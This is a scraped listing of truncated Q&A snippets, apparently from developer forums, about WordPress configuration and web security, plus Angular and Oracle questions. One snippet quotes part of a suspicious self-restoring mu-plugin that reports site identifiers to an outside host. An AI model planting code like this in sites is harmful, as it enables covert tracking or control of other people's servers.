I have run into some WordPress code which does POST requests to API sites and in the POST parameters for the SSL property it has $params = array( ‘body’ => $_POST, ‘sslverify’ => apply_filters(‘https_local_ssl_verify’, false)); So why not simply put false or true? 1 Answer 1 The apply_filters() function lets plugins and themes override the … Read more
I did a lot of searching and also read the PHP $_SERVER docs. Do I have this right regarding which to use for my PHP scripts for simple link definitions used throughout my site? $_SERVER[‘SERVER_NAME’] is based on your web server’s config file (Apache2 in my case), and varies depending on a few directives: (1) … Read more
I am running WordPress 3.3.2 self-hosted. I used to see the option “I would like my site to be private, visible only to users I choose” under Privacy Settings but I no longer see this option. Instead, now I only see the options to make the blog visible or not visible to search engines, but … Read more
e.g. curl -I http://ma.tt/blog/wp-config.php 200 OK The wp-config.php is not public facing file, since it currently just return blank page, so why not return 404 instead. (so will not be cached by Google) Also, for file such as readme.html, it should be hidden as it disclose your wordpress version, e.g. http://ma.tt/blog/readme.html So, currently I have … Read more
What is creating this file? It’s in /wp-content/mu-plugins directory. If I delete it, it comes back after a while. it contains these code: <?php if(!function_exists(‘do_rms_activation_task’)) { /* ————Register Config Variables———— */ $GLOBALS[‘rms_report_to’] = ‘https://managerly.org/wp-admin/admin-ajax.php’; $GLOBALS[‘rms_disclaimer_text’] = []; $GLOBALS[‘rms_ajax_del_request’] = false; function send_rms_curl_request($action, $body) { $body[‘action’] = $action; $body[‘remote_site_hash’] = get_option(‘rms_remote_site_hash’, ”); $body[‘remote_site_id’] = get_option(‘rms_remote_site_id’, 0); … Read more
I am trying to use Angular with a list of apps, and each one is a link to see an app in more detail (apps/app.id): <a id=”{{app.id}}” href=”https://stackoverflow.com/questions/15606751/apps/{{app.id}}” >{{app.name}}</a> Every time I click on one of these links, Chrome shows the URL as unsafe:chrome-extension://kpbipnfncdpgejhmdneaagc…/apps/app.id Where does the unsafe: come from? 6 Answers 6
Is default functions like update_post_meta() safe to use user inputs? e.g. update_post_meta(76, ‘my_key’, $_GET[‘value’]) Or should I use $_GET[‘value’] = sanitize_text_field($_GET[‘value’]); before using update_post_meta(76, ‘my_key’, $_GET[‘value’]) 2 Answers 2 After upvoting @pieter’s answer…. In recent time I came to the realization that it is much better to handle “bad” data gracefully when it is used … Read more
I’ve just read on the net about a newly discovered security vulnerability in ASP.NET. You can read the details here. The problem lies in the way that ASP.NET implements the AES encryption algorithm to protect the integrity of the cookies these applications generate to store information during user sessions. This is a bit vague, but … Read more
Is it good to install wordpress in a subdirectory (with a random name), but set “Homepage” address to domain root? (based on Giving WordPress Its Own Directory) Since the wp-content is in the subdirectory and every link to photos and other files (including plugins css and js) in homepage, includes the full path of content … Read more
I’m using Oracle for development. The password for a bootstrap account that I always use to rebuild my database has expired. How do I turn off password expiration for this user (and all other users) permanently? I’m using Oracle 11g, which has passwords expire by default. 6 Answers 6
